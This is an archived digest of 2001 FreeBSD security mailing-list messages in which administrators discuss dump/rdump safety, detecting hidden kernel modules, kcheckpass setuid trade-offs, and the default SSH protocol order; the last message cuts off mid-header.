From owner-freebsd-security Sun Oct 21 5: 4:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1]) by hub.freebsd.org (Postfix) with ESMTP id E060837B401 for ; Sun, 21 Oct 2001 05:04:38 -0700 (PDT) Received: (from root@localhost) by cage.simianscience.com (8.11.6/8.11.6) id f9LC4al08280; Sun, 21 Oct 2001 08:04:36 -0400 (EDT) (envelope-from mike@sentex.net) Received: from chimp.sentex.net (fcage [192.168.0.2]) by cage.simianscience.com (8.11.6/8.11.6av) with ESMTP id f9LC4Q608272; Sun, 21 Oct 2001 08:04:31 -0400 (EDT) (envelope-from mike@sentex.net) Message-Id: <5.1.0.14.0.20011021080246.03988ac0@192.168.0.12> X-Sender: mdtancsa@192.168.0.12 X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Sun, 21 Oct 2001 08:04:25 -0400 To: Hassan Halta From: Mike Tancsa Subject: Re: using dump for backups. Cc: In-Reply-To: <20011020231659.H77421-100000@quark.cs.earlham.edu> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 11:19 PM 10/20/2001 -0500, Hassan Halta wrote: >Hi all, > >I was thinking of using dump/restore way to backup files on the system. I >heard sometime ago that FreeBSD dump was insecure. So, I am wondering if >this is still the case, and how insecure it is, or what the fixes for it? >I would like to know more about it if possible, Dump just creates a backup file. Perhaps you are thinking of the method of using dump to a remote file which uses rsh. That _method_ of using dump is insecure. If you will be using dump to dump to a remote machine, just use ssh instead. ---Mike -------------------------------------------------------------------- Mike Tancsa, tel +1 519 651 3400 Sentex Communications, mike@sentex.net Providing Internet since 1994 www.sentex.net Cambridge, Ontario Canada www.sentex.net/mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 21 7:33: 3 2001 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id 9ABE637B405 for ; Sun, 21 Oct 2001 07:32:58 -0700 (PDT) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id LAA78508; Sun, 21 Oct 2001 11:33:23 -0300 (ART) X-Authentication-Warning: ns1.via-net-works.net.ar: fpscha set sender to fschapachnik@vianetworks.com.ar using -f Date: Sun, 21 Oct 2001 11:33:23 -0300 From: Fernando Schapachnik To: Hassan Halta Cc: freebsd-security@FreeBSD.ORG Subject: Re: using dump for backups. Message-ID: <20011021113323.A77630@ns1.via-net-works.net.ar> References: <20011020231659.H77421-100000@quark.cs.earlham.edu> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Disposition: inline Content-Transfer-Encoding: 8bit User-Agent: Mutt/1.2.5i In-Reply-To: <20011020231659.H77421-100000@quark.cs.earlham.edu>; from hassan@cs.earlham.edu on Sat, Oct 20, 2001 at 11:19:26PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org dump has had a history of exploitable overflows, which of course had been fixed. Anyway, the risk was just having it on the system, and using it or not didn't change the risk. Regards. En un mensaje anterior, Hassan Halta escribió: > Hi all, > > I was thinking of using dump/restore way to backup files on the system. I > heard sometime ago that FreeBSD dump was insecure. So, I am wondering if > this is still the case, and how insecure it is, or what the fixes for it? > I would like to know more about it if possible, > > Thanks a lot, > > Hassan > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message Fernando P. Schapachnik Gerente de tecnología de red y sistemas de información VIA NET.WORKS ARGENTINA S.A. fschapachnik@vianetworks.com.ar Tel.: (54-11) 4323-3381 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 21 15:27:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from www.kpi.com.au (www.kpi.com.au [203.39.132.210]) by hub.freebsd.org (Postfix) with ESMTP id C40CD37B403 for ; Sun, 21 Oct 2001 15:27:41 -0700 (PDT) Received: from kpi.com.au (localhost.kpi.com.au [127.0.0.1]) by www.kpi.com.au (8.9.3/8.9.3) with ESMTP id JAA24419; Mon, 22 Oct 2001 09:35:01 +1100 (EST) (envelope-from johnsa@kpi.com.au) Message-ID: <3BD34BD2.B33C7D29@kpi.com.au> Date: Mon, 22 Oct 2001 09:27:30 +1100 From: Andrew Johns X-Mailer: Mozilla 4.7 [en-gb] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: CS Cc: freebsd-security@FreeBSD.ORG Subject: Re: KLD detectors References: <20011019150517.E56217-100000@bigpoop.foo.foo> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org CS wrote: > > Hello, > > Does anyone know of a program for FreeBSD to look for "hidden" KLDs? > > I found this for linux: > > http://www.hsc.fr/ressources/breves/LKMrootkits.html > > But so far, nothing for FreeBSD. > > Thanks, > > CS > I found this a while ago - have never looked into it myself - just saved the URL for times like this. http://www.chkrootkit.org They have versions for most un*x's. -- Andrew Johns ================================================================ BUGS:This utility is a prototype which lasted several years past its expiration date and is greatly in need of death. - from FreeBSD sysinstall man page To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 21 18: 0:57 2001 Delivered-To: freebsd-security@freebsd.org Received: from mercury.is.co.za (mercury.is.co.za [196.4.160.222]) by hub.freebsd.org (Postfix) with ESMTP id 2410837B401 for ; Sun, 21 Oct 2001 18:00:54 -0700 (PDT) Received: from c2-pta-69.dial-up.net (c2-pta-69.dial-up.net [196.34.158.197]) by mercury.is.co.za (Postfix) with ESMTP id 7D9813F5E; Mon, 22 Oct 2001 03:00:50 +0200 (SAST) Date: Mon, 22 Oct 2001 03:03:07 +0200 (SAST) From: The Psychotic Viper X-X-Sender: To: Andrew Johns Cc: CS , Subject: Re: KLD detectors In-Reply-To: <3BD34BD2.B33C7D29@kpi.com.au> Message-ID: <20011022025913.G26647-100000@lucifer.fuzion.ath.cx> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, On Mon, 22 Oct 2001, Andrew Johns wrote: > CS wrote: > > > > Hello, > > > > Does anyone know of a program for FreeBSD to look for "hidden" KLDs? > > > > I found this for linux: > > > > http://www.hsc.fr/ressources/breves/LKMrootkits.html > > > > But so far, nothing for FreeBSD. > > > > Thanks, > > > > CS > > > > I found this a while ago - have never looked into it myself - > just saved the URL for times like this. > > http://www.chkrootkit.org > > They have versions for most un*x's. better yet they in the ports /usr/ports/security/chkrootkit =) and have no idea on how to check for them but you could enable kernel secure levels (if the machine is not going to use X or any securelevelphobic software) which would limit the chance of being bitten by a stray module. Just its not the all-curing-fix but limits what you would need to look at/check to avoid such nasties. HTH, PsyV To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Oct 21 18:28:27 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.wlcg.com (mail.wlcg.com [198.92.199.5]) by hub.freebsd.org (Postfix) with ESMTP id 9D0BA37B405 for ; Sun, 21 Oct 2001 18:28:23 -0700 (PDT) Received: (from root@localhost) by mail.wlcg.com (8.11.6/8.11.6) id f9M1SNu22240; Sun, 21 Oct 2001 21:28:23 -0400 (EDT) (envelope-from rsimmons@wlcg.com) Received: from localhost (rsimmons@localhost) by mail.wlcg.com (8.11.6/8.11.6) with ESMTP id f9M1SMr22233; Sun, 21 Oct 2001 21:28:22 -0400 (EDT) (envelope-from rsimmons@wlcg.com) X-Authentication-Warning: mail.wlcg.com: rsimmons owned process doing -bs Date: Sun, 21 Oct 2001 21:28:18 -0400 (EDT) From: Rob Simmons To: Hassan Halta Cc: freebsd-security@freebsd.org Subject: Re: using dump for backups. In-Reply-To: <20011020231659.H77421-100000@quark.cs.earlham.edu> Message-ID: <20011021211141.E7102-100000@mail.wlcg.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Virus-Scanned: by AMaViS perl-10 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- Hash: RIPEMD160 Using dump locally to a tape, or other device is safe. Using rdump and enabling rsh on a remote machine to dump to a device on that machine can be unsafe due to rsh, not dump itself. If you need to dump to a remote device, you can use ssh to make it safer. You can also look into using Amanda, which can use Kerberos to make the remote dumps safer as well. Amanda can use tar as well. As far as Amanda is concerned, dump and tar are interchangeable. Also, unfortunately the port for Amanda in the ports collection does not have options for Kerberos. You will need to look at the configure options to Amanda, and extract the proper configure switches, and add them yourself to CONFIGURE_ARGS (of course, after adding MAKE_KERBEROS4=yes to your make.conf). As far as I know, Amanda only works with krb4, not krb5 yet. I could be wrong. Robert Simmons Systems Administrator http://www.wlcg.com/ On Sat, 20 Oct 2001, Hassan Halta wrote: > Hi all, > > I was thinking of using dump/restore way to backup files on the system. I > heard sometime ago that FreeBSD dump was insecure. So, I am wondering if > this is still the case, and how insecure it is, or what the fixes for it? > I would like to know more about it if possible, > > Thanks a lot, > > Hassan > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE703Y2v8Bofna59hYRAyw7AKC9pbK095BRUUn+Scv7co5DXCI6awCcCot0 tpLnAyKAkx5sWuFc92iC9i0= =64an -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 22 2:26:45 2001 Delivered-To: freebsd-security@freebsd.org Received: from robin.mail.pas.earthlink.net (robin.mail.pas.earthlink.net [207.217.120.65]) by hub.freebsd.org (Postfix) with ESMTP id D455137B401 for ; Mon, 22 Oct 2001 02:26:43 -0700 (PDT) Received: from dialup-209.247.143.67.dial1.sanjose1.level3.net ([209.247.143.67] helo=blossom.cjclark.org) by robin.mail.pas.earthlink.net with esmtp (Exim 3.33 #1) id 15vbLu-0003mM-00; Mon, 22 Oct 2001 02:26:35 -0700 Received: (from cjc@localhost) by blossom.cjclark.org (8.11.6/8.11.3) id f9M9PZH02340; Mon, 22 Oct 2001 02:25:35 -0700 (PDT) (envelope-from cjc) Date: Mon, 22 Oct 2001 02:25:34 -0700 From: "Crist J. Clark" To: Fernando Schapachnik Cc: Hassan Halta , freebsd-security@FreeBSD.ORG Subject: Re: using dump for backups. Message-ID: <20011022022534.B332@blossom.cjclark.org> Reply-To: cjclark@alum.mit.edu References: <20011020231659.H77421-100000@quark.cs.earlham.edu> <20011021113323.A77630@ns1.via-net-works.net.ar> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011021113323.A77630@ns1.via-net-works.net.ar>; from fschapachnik@vianetworks.com.ar on Sun, Oct 21, 2001 at 11:33:23AM -0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Sun, Oct 21, 2001 at 11:33:23AM -0300, Fernando Schapachnik wrote: > dump has had a history of exploitable overflows, which of course had > been fixed. > > Anyway, the risk was just having it on the system, and using it or > not didn't change the risk. And dump(8) has not been setuid root since 1997. It has not been setgid tty for just over a month. -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 22 2:30:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from shikima.mine.nu (pc1-card3-0-cust143.cdf.cable.ntl.com [62.252.49.143]) by hub.freebsd.org (Postfix) with ESMTP id 01B2037B401 for ; Mon, 22 Oct 2001 02:30:17 -0700 (PDT) Received: from rasputin by shikima.mine.nu with local (Exim 3.33 #1) id 15vbQG-0007ty-00 for security@freebsd.org; Mon, 22 Oct 2001 10:31:04 +0100 Date: Mon, 22 Oct 2001 10:31:04 +0100 From: Rasputin To: security@freebsd.org Subject: Re: KCheckPass -- make it setuid root or not? Message-ID: <20011022103103.A30341@shikima.mine.nu> Reply-To: Rasputin References: <20011019120706.T25747@squall.waterspout.com> <20011019120741.U25747@squall.waterspout.com> <200110191743.BAA06128@venus.cyber.mmu.edu.my> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200110191743.BAA06128@venus.cyber.mmu.edu.my>; from nuzrin@goose.net.my on Sat, Oct 20, 2001 at 01:58:52AM +0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org * nuzrin yaapar [011019 18:50]: > On Saturday 20 October 2001 1:07 am, Will Andrews wrote: > > On Fri, Oct 19, 2001 at 12:07:06PM -0500, Will Andrews wrote: > > > OK, so I keep getting mail every now and then from people who > > > can't figure out why kcheckpass / kscreensaver won't authenticate > > > their password(s). It's because I decided to play it safe and > > > made kcheckpass non setuid root, which it needs in order to call > > > getpwnam(). > > > > > > But now I'm tired of getting these emails from people who don't > > > notice the message that kdebase spouts about it. I want to know > > > if people think it's a safe "risk" to give kcheckpass setuid root > > > privileges so it Just Works(tm) when people try KDE. > So, I think it's better to have setuid root for kcheckpass. Most people won't > notice the message, unless they have nothing to do and decided to watch the > whole compilation/installation process. Most of us just 'cd > /usr/ports/x11/kde2 && make install clean' and leave it overnight to finish. > Next morning when kde2 installation have finished...the message has long > scroll past the screen and lost.... Surely a lot of ports have a target to allow you to print a messages at the end of the build (usually after the install target) - if you point it out at that stage, there's no excuse for not reading it, I guess (/usr/ports/x11/eterm does this if you need to check how it's done) -- Necessity is a mother. Rasputin :: Jack of All Trades - Master of Nuns :: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 22 2:35:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from shikima.mine.nu (pc1-card3-0-cust143.cdf.cable.ntl.com [62.252.49.143]) by hub.freebsd.org (Postfix) with ESMTP id 1E88737B40A for ; Mon, 22 Oct 2001 02:35:29 -0700 (PDT) Received: from rasputin by shikima.mine.nu with local (Exim 3.33 #1) id 15vbVI-0007ua-00 for security@freebsd.org; Mon, 22 Oct 2001 10:36:16 +0100 Date: Mon, 22 Oct 2001 10:36:16 +0100 From: Rasputin To: security@freebsd.org Subject: Re: KCheckPass -- make it setuid root or not? Message-ID: <20011022103616.A30402@shikima.mine.nu> Reply-To: Rasputin References: <20011019120706.T25747@squall.waterspout.com> <20011019120741.U25747@squall.waterspout.com> <200110191743.BAA06128@venus.cyber.mmu.edu.my> <20011022103103.A30341@shikima.mine.nu> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011022103103.A30341@shikima.mine.nu>; from rasputin@submonkey.net on Mon, Oct 22, 2001 at 10:31:04AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Ugh, sorry - missing subject fools another sucker :) -- Rasputin :: Jack of All Trades - Master of Nuns :: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 22 12:17: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from angryfist.fasttrackmonkey.com (dsl081-195-105.nyc2.dsl.speakeasy.net [64.81.195.105]) by hub.freebsd.org (Postfix) with ESMTP id 9119637B403 for ; Mon, 22 Oct 2001 12:16:56 -0700 (PDT) Received: (qmail 60280 invoked by uid 1001); 22 Oct 2001 19:07:08 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 22 Oct 2001 19:07:08 -0000 Date: Mon, 22 Oct 2001 15:07:08 -0400 (EDT) From: CS X-X-Sender: To: The Psychotic Viper Cc: Andrew Johns , "freebsd-security@FreeBSD.ORG" Subject: Re: KLD detectors In-Reply-To: <20011022025913.G26647-100000@lucifer.fuzion.ath.cx> Message-ID: <20011022150129.G60205-100000@bigpoop.foo.foo> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, Thanks for the info, I'll test it out on a few I've found (bsd versions of adore). I'm also interested in utilizing securelevels, but I'm still not 100% sure that securelevel 1 will actually stop this, as there seem to be a number of tools out there to bypass the securelevel restriction. For example: http://www.s0ftpj.org/en/tools.html Scroll down to "securelevel bypass": http://www.s0ftpj.org/tools/securelvl.tgz Also, I'm finding myself upgrading bits and pieces of the system more often (telnetd, openssh, etc.) and I'm wavering on what exactly I should set the "schg" flags on. Most of my machines are remote, and I also don't want to revert to NT behaviour of "oh you patched, now you must reboot"... Charles On Mon, 22 Oct 2001, The Psychotic Viper wrote: > Hi, > > On Mon, 22 Oct 2001, Andrew Johns wrote: > > > CS wrote: > > > > > > Hello, > > > > > > Does anyone know of a program for FreeBSD to look for "hidden" KLDs? > > > > > > I found this for linux: > > > > > > http://www.hsc.fr/ressources/breves/LKMrootkits.html > > > > > > But so far, nothing for FreeBSD. > > > > > > Thanks, > > > > > > CS > > > > > > > I found this a while ago - have never looked into it myself - > > just saved the URL for times like this. > > > > http://www.chkrootkit.org > > > > They have versions for most un*x's. > better yet they in the ports /usr/ports/security/chkrootkit =) and have no > idea on how to check for them but you could enable kernel secure levels > (if the machine is not going to use X or any securelevelphobic software) > which would limit the chance of being bitten by a stray module. Just its > not the all-curing-fix but limits what you would need to look at/check to > avoid such nasties. > > HTH, > PsyV > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 22 16:33:40 2001 Delivered-To: freebsd-security@freebsd.org Received: from mercury.is.co.za (mercury.is.co.za [196.4.160.222]) by hub.freebsd.org (Postfix) with ESMTP id 9ECC237B403 for ; Mon, 22 Oct 2001 16:33:25 -0700 (PDT) Received: from c4-pta-19.dial-up.net (c4-pta-19.dial-up.net [196.26.210.19]) by mercury.is.co.za (Postfix) with ESMTP id 7361B3F21; Tue, 23 Oct 2001 01:33:19 +0200 (SAST) Date: Tue, 23 Oct 2001 01:35:35 +0200 (SAST) From: The Psychotic Viper X-X-Sender: To: CS Cc: Andrew Johns , "freebsd-security@FreeBSD.ORG" Subject: Re: KLD detectors In-Reply-To: <20011022150129.G60205-100000@bigpoop.foo.foo> Message-ID: <20011023012559.A28285-100000@lucifer.fuzion.ath.cx> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi again, On Mon, 22 Oct 2001, CS wrote: > Hi, > > Thanks for the info, I'll test it out on a few I've found (bsd versions of > adore). > > I'm also interested in utilizing securelevels, but I'm still not 100% sure > that securelevel 1 will actually stop this, as there seem to be a number > of tools out there to bypass the securelevel restriction. For example: > > http://www.s0ftpj.org/en/tools.html > > Scroll down to "securelevel bypass": > http://www.s0ftpj.org/tools/securelvl.tgz Yes remember secure levels arent going to be the all in one solution (not sure if i mentioned it before) but helps aid security aware admins and provides yet another layer of security, use it in tandem with freebsd's own security scripts and maybe aide or tripwire to increase security, but any clue'd up cracker could know was around either mechanism which is why the more the better (but be careful not to kludge the machine down with too much as it can become a nightmare too). > Also, I'm finding myself upgrading bits and pieces of the system more > often (telnetd, openssh, etc.) and I'm wavering on what exactly I should > set the "schg" flags on. Most of my machines are remote, and I also don't > want to revert to NT behaviour of "oh you patched, now you must reboot"... As for that point then maybe one of the other alternatives would serve you better as you can do upgrades seamlessly if everything works the way it should.Kernel secure levels make it slightly more difficult to do regular work on the system. So look into other ways of securing your internal machine and monitoring and see which suits you best. Best place to start looking would be /usr/ports/security and around the internet. HTH PsyV To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 22 16:50:12 2001 Delivered-To: freebsd-security@freebsd.org Received: from robin.mail.pas.earthlink.net (robin.mail.pas.earthlink.net [207.217.120.65]) by hub.freebsd.org (Postfix) with ESMTP id 1BAE437B401 for ; Mon, 22 Oct 2001 16:50:10 -0700 (PDT) Received: from dialup-209.247.140.189.dial1.sanjose1.level3.net ([209.247.140.189] helo=blossom.cjclark.org) by robin.mail.pas.earthlink.net with esmtp (Exim 3.33 #1) id 15vopW-0000tU-00; Mon, 22 Oct 2001 16:50:04 -0700 Received: (from cjc@localhost) by blossom.cjclark.org (8.11.6/8.11.3) id f9MNnXK01500; Mon, 22 Oct 2001 16:49:33 -0700 (PDT) (envelope-from cjc) Date: Mon, 22 Oct 2001 16:49:32 -0700 From: "Crist J. Clark" To: CS Cc: The Psychotic Viper , Andrew Johns , "freebsd-security@FreeBSD.ORG" Subject: Re: KLD detectors Message-ID: <20011022164932.C364@blossom.cjclark.org> Reply-To: cjclark@alum.mit.edu References: <20011022025913.G26647-100000@lucifer.fuzion.ath.cx> <20011022150129.G60205-100000@bigpoop.foo.foo> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20011022150129.G60205-100000@bigpoop.foo.foo>; from spork@fasttrackmonkey.com on Mon, Oct 22, 2001 at 03:07:08PM -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, Oct 22, 2001 at 03:07:08PM -0400, CS wrote: > Hi, > > Thanks for the info, I'll test it out on a few I've found (bsd versions of > adore). > > I'm also interested in utilizing securelevels, but I'm still not 100% sure > that securelevel 1 will actually stop this, as there seem to be a number > of tools out there to bypass the securelevel restriction. For example: > > http://www.s0ftpj.org/en/tools.html > > Scroll down to "securelevel bypass": > http://www.s0ftpj.org/tools/securelvl.tgz If you actually look at what this is, it is a KLD that once loaded, will allow users to load KLDs at securelevel > 0. If you have a securelevel > 0 and do not already have this module loaded, it doesn't do anything for you. It doesn't break securelevel(8) or provide a workaround. -- Crist J. Clark | cjclark@alum.mit.edu | cjclark@jhu.edu http://people.freebsd.org/~cjc/ | cjc@freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Oct 22 21:58:39 2001 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id C7A9337B403; Mon, 22 Oct 2001 21:58:31 -0700 (PDT) Received: (from str@localhost) by giganda.komkon.org (8.11.3/8.11.3) id f9N4wCX13835; Tue, 23 Oct 2001 00:58:12 -0400 (EDT) (envelope-from str) Date: Tue, 23 Oct 2001 00:58:12 -0400 (EDT) From: Igor Roshchin Message-Id: <200110230458.f9N4wCX13835@giganda.komkon.org> To: ghelmer@palisadesys.com, scanner@jurai.net, will@physics.purdue.edu Subject: RE: your mail Cc: kde@FreeBSD.ORG, ports@FreeBSD.ORG, security@FreeBSD.ORG In-Reply-To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > From owner-freebsd-security@FreeBSD.ORG Fri Oct 19 13:33:02 2001 > From: "Guy Helmer" > To: "Will Andrews" , > Cc: , , > Subject: RE: your mail > Date: Fri, 19 Oct 2001 12:36:15 -0500 > > > On Friday, October 19, 2001 12:16 PM, Will Andrews wrote: > > On Fri, Oct 19, 2001 at 01:15:31PM -0400, scanner@jurai.net wrote: > > > I think the actual problem isn't so much the message per se, > > its the fact > > > its placed in the wrong place. It should be shown at the *end* of the > > > build instead of during the building of kdebase. When you go to > > build the > > > metaport of KDE2 no one wants to sit there watching the output for 12 > > > hours while it builds. They want to come back and see the familiar > > > "everything built ok" and then install it. If you place it as > > the message > > > at the end of the build *alot* more people would see the > > > message. Otherwise no one is going to catch it. Just my $.02. > > > > Yeah, I'm aware of that. Unfortunately, there is nothing I can > > do about that, because people might be invoking the kdebase port > > from anywhere. So it's a general ports problem. :\ > > How about sending an email message to "root" with this message? It solves > the problem of the message scrolling by during the installation... > I don't think I'd always want to have an e-mail message sent to root or to the building user. Probably, it can be an option, but not a default one. Talking about "general ports problem": script(1) is a good solution in this situation. It allows one to record all output, including warnings and such. Regards, Igor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 23 6:16:42 2001 Delivered-To: freebsd-security@freebsd.org Received: from warsaw.scl.ameslab.gov (warsaw.scl.ameslab.gov [147.155.137.63]) by hub.freebsd.org (Postfix) with ESMTP id 8D7F337B401 for ; Tue, 23 Oct 2001 06:16:35 -0700 (PDT) Received: (from kparz@localhost) by warsaw.scl.ameslab.gov (8.11.6/8.11.6) id f9NDHTR10976 for freebsd-security@freebsd.org; Tue, 23 Oct 2001 08:17:30 -0500 (CDT) (envelope-from kparz) Date: Tue, 23 Oct 2001 08:17:29 -0500 From: Krzysztof Parzyszek To: freebsd-security@freebsd.org Subject: SSH default protocol Message-ID: <20011023081729.A10955@warsaw.scl.ameslab.gov> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I noticed some time ago that in ssh_config, the Protocol field is now `1, 2' instead of `2, 1' as it used to be. Does anyone know why this has changed? -- ,oOo.Bc -=EE Krzysztof Parzyszek 10/12/2001 2:59pm -'7' `L' ---If this sentence is true, then every sentence is true. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 23 11:36:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from green.bikeshed.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 3071337B403; Tue, 23 Oct 2001 11:36:42 -0700 (PDT) Received: from localhost (green@localhost) by green.bikeshed.org (8.11.4/8.11.1) with ESMTP id f9NIaXT48902; Tue, 23 Oct 2001 14:36:38 -0400 (EDT) (envelope-from green@green.bikeshed.org) Message-Id: <200110231836.f9NIaXT48902@green.bikeshed.org> X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 To: Krzysztof Parzyszek Cc: freebsd-security@freebsd.org Subject: Re: SSH default protocol In-Reply-To: Message from Krzysztof Parzyszek of "Tue, 23 Oct 2001 08:17:29 CDT." <20011023081729.A10955@warsaw.scl.ameslab.gov> From: "Brian F. Feldman" Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 23 Oct 2001 14:36:33 -0400 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Krzysztof Parzyszek wrote: > I noticed some time ago that in ssh_config, the Protocol field > is now `1, 2' instead of `2, 1' as it used to be. > Does anyone know why this has changed? Users complain that "SSH doesn't work anymore!!!", and don't RTFM and get things wrong. Rather, that is the strawman used, and I haven't seen a user not understand that protocol 2 works differently than protocol 1. I'd rather give users more credit and let people realize they should be using protocol 2, not 1 anymore. But convince everyone else of that. -- Brian Fundakowski Feldman \ FreeBSD: The Power to Serve! / green@FreeBSD.org `------------------------------' To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Oct 23 13:31:53 2001 Delivered-To: freebsd-security@freebsd.org Received: from avocet.prod.itd.earthlink.net (avocet.mail.pas.earthlink.net [207.217.121.50]) by hub.freebsd.org (Postfix) with ESMTP id EF63C37B401 for ; Tue, 23 Oct 2001 13:31:49 -0700 (PDT) Received: from dialup-209.245.135.218.dial1.sanjose1.level3.net ([209.245.135.218] helo=blossom.cjclark.org) by avocet.prod.itd.earthlink.net with esmtp (Exim 3.33 #1) id 15w8D9-0006D9-00; Tue, 23 Oct 2001 13:31:44 -0700 Received: (from cjc@localhost) by blossom.cjclark.org 